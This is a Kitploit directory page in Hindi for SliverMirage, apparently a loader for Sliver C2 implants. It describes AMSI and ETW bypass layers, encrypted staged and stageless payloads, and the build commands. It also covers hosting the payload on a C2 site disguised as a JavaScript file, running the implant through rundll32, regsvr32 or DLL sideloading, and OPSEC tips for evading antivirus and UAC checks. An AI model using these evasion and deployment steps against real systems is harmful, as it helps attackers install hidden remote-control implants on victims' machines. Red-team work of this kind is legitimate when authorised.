Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SliverMirage — Sliver C2 के लिए Crystal Palace PICO लोडर — दोहरी-परत AMSI बाइपास, ETW साइलेंसिंग, AES-256-CBC एन्क्रिप्टेड पेलोड, 6 डिलीवरी वैरिएंट | Kitploit
उपकरण/GitHubGitHub/daniomass/slivermirage
शोषणपोस्ट-शोषणमालवेयर विश्लेषणकमांड एंड कंट्रोलबाइनरी विश्लेषणरेड टीमिंगपेलोड डेवलपमेंट
GitHubdaniomass/slivermirage

SliverMirage

Sliver C2 के लिए Crystal Palace PICO लोडर — दोहरी-परत AMSI बाइपास, ETW साइलेंसिंग, AES-256-CBC एन्क्रिप्टेड पेलोड, 6 डिलीवरी वैरिएंट

रिपॉजिटरी देखें
1545 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SliverMirage

CrystalSliver का एक फोर्क, जो Crystal Palace PICO लोडर को दो-परत वाले AMSI बायपास, ETW साइलेंसिंग, और Sliver C2 के लिए छह डिलीवरी वेरिएंट के साथ विस्तारित करता है।

यह क्या करता है

SliverMirage एक Sliver इम्प्लांट DLL को Crystal Palace PICO वर्चुअलाइजेशन के माध्यम से लपेटता है, फिर इसे एक लोडर के जरिए डिलीवर करता है जो amsi.dll या ntdll.dll को पैच किए बिना AMSI और ETW को बायपास करता है।

एवेज़न स्टैक:

परततकनीकविवरण
AMSI L1CLR स्ट्रिंग करप्शनLdrRegisterDllNotification clr.dll लोड को इंटरसेप्ट करता है, CLR के GetProcAddress कॉल करने से पहले .rdata में AmsiScanBuffer को करप्ट करता है
AMSI L2VEH + HWBPAmsiScanBuffer पर Vectored Exception Handler E_INVALIDARG रिटर्न करता है
ETWHWBPNtTraceControl पर DR1, STATUS_SUCCESS रिटर्न करता है
पेलोडAES-256-CBC + XORBCrypt डिक्रिप्शन, VirtualAlloc(RW) -> VirtualProtect(RX), ज़ीरो RWX
वर्चुअलाइजेशनCrystal Palace PICOSliver DLL एक PICO प्रोसेस के अंदर चलता है, जो यूज़रलैंड AV के लिए अदृश्य है

वेरिएंट

फ़ॉर्मेटफ़ाइलडिलीवरीरनटाइम पर C2?
exeस्टेज्ड EXEC2 वेबसाइट पर EXE + payload.datहाँ (HTTPS)
exe-stagelessस्टेजलेस EXEएकल EXEनहीं
dllस्टेजलेस DLLएकल DLLनहीं
dll-stagedस्टेज्ड DLLC2 वेबसाइट पर DLL + payload.datहाँ (HTTPS)
shellcodeस्टेज्ड शेलकोड.bin + payload.datहाँ (HTTPS)
shellcode-stagelessस्टेजलेस शेलकोडएकल .binनहीं

स्टेज्ड वेरिएंट रनटाइम पर एक Sliver HTTPS वेबसाइट से एन्क्रिप्टेड PICO डाउनलोड करते हैं। EXE/DLL छोटा (~20 KB) होता है और डिस्क पर कोई पेलोड नहीं रखता।

स्टेजलेस वेरिएंट कंपाइल टाइम पर एन्क्रिप्टेड PICO एम्बेड करते हैं (XOR + AES डबल-लेयर)। डिस्क पर बड़ा होता है लेकिन बीकन कॉलबैक से पहले नेटवर्क गतिविधि शून्य होती है।

त्वरित आरंभ

आवश्यक शर्तें

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 pefile के साथ (pip install pefile)
  • openssl
  • Java 17 (Crystal Palace के लिए — build.sh द्वारा ऑटो-प्रोविज़न किया जाता है)

build.sh के साथ बिल्ड करें (अनुशंसित)

बिल्ड स्क्रिप्ट गायब डिपेंडेंसियों को ऑटो-प्रोविज़न करती है (Crystal Palace और Java 17 सहित) और पूरी पाइपलाइन संभालती है: DLL -> Crystal Palace PICO -> एन्क्रिप्ट -> कंपाइल।

root@kitploit:~
# Staged EXE (default)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

विकल्प:

  • --dll <path> — Sliver इम्प्लांट DLL (आवश्यक)
  • --host <ip> — C2 सर्वर IP (स्टेज्ड फॉर्मेट के लिए आवश्यक)
  • --port <port> — C2 पोर्ट (डिफ़ॉल्ट: 443)
  • --path <path> — पेलोड डाउनलोड के लिए URL पथ (डिफ़ॉल्ट: /assets/js/vendor.js)
  • --format <fmt> — आउटपुट फ़ॉर्मेट (डिफ़ॉल्ट: exe)
  • --export <name> — कस्टम DLL एक्सपोर्ट नाम

Make के साथ बिल्ड करें (मैनुअल)

यदि आपके पास पहले से Crystal Palace PICO ब्लॉब है:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# All targets
make clean

डिप्लॉयमेंट

स्टेज्ड (EXE या DLL)

  1. build/payload.dat को Sliver HTTPS वेबसाइट पर अपलोड करें:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. टार्गेट पर build/csvchelper.exe (या .dll) डिलीवर करें।

स्टेजलेस

एकल फ़ाइल डिलीवरी। किसी C2 वेबसाइट सेटअप की आवश्यकता नहीं है।

DLL निष्पादन विधियाँ

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

या DLL साइडलोडिंग का उपयोग करें (टार्गेट एप्लिकेशन द्वारा लोड किए गए वैध DLL से मेल खाने के लिए नाम बदलें)।

एक्सपोर्ट्स: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

प्रोजेक्ट संरचना

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

OPSEC नोट्स

  • IAT साफ है: केवल kernel32, advapi32, bcrypt — सभी वैध Windows APIs
  • कोई मेमोरी पैच नहीं: AMSI/ETW बायपास हार्डवेयर ब्रेकपॉइंट्स का उपयोग करता है, सिस्टम DLL पर VirtualProtect नहीं
  • कोई RWX नहीं: पेलोड मेमोरी RW -> RX जाती है, कभी RWX नहीं
  • GUI सबसिस्टम: WinMain एंट्री पॉइंट, -mwindows — कोई कंसोल फ्लैश नहीं
  • वर्जन जानकारी + मेनिफेस्ट: एम्बेडेड asInvoker मेनिफेस्ट UAC ह्यूरिस्टिक्स को दबाता है
  • एन्ट्रॉपी नियंत्रण: स्टेजलेस पेलोड एन्ट्रॉपी को ~7.8 से घटाकर ~6.0-6.5 करने के लिए XOR रोलिंग की का उपयोग करते हैं
  • बिल्ड करने से पहले अपनी कवर पहचान के साथ resource.rc / resource_dll.rc कस्टमाइज़ करें

अस्वीकरण

यह प्रोजेक्ट केवल अधिकृत सुरक्षा परीक्षण, शोध और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन वातावरणों में करें जहाँ आपके पास पेनेट्रेशन परीक्षण करने की स्पष्ट लिखित अनुमति हो। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ्टवेयर के दुरुपयोग के लिए कोई ज़िम्मेदारी नहीं लेते हैं।

श्रेय

  • Crystal Palace by Rasta Mouse — PICO वर्चुअलाइजेशन इंजन
  • CrystalSliver — मूल Crystal Palace + Sliver एकीकरण
  • sRDI by Nick Landers — शेलकोड रिफ्लेक्टिव DLL इंजेक्शन तकनीक

लाइसेंस

MIT

टूल डाउनलोड करें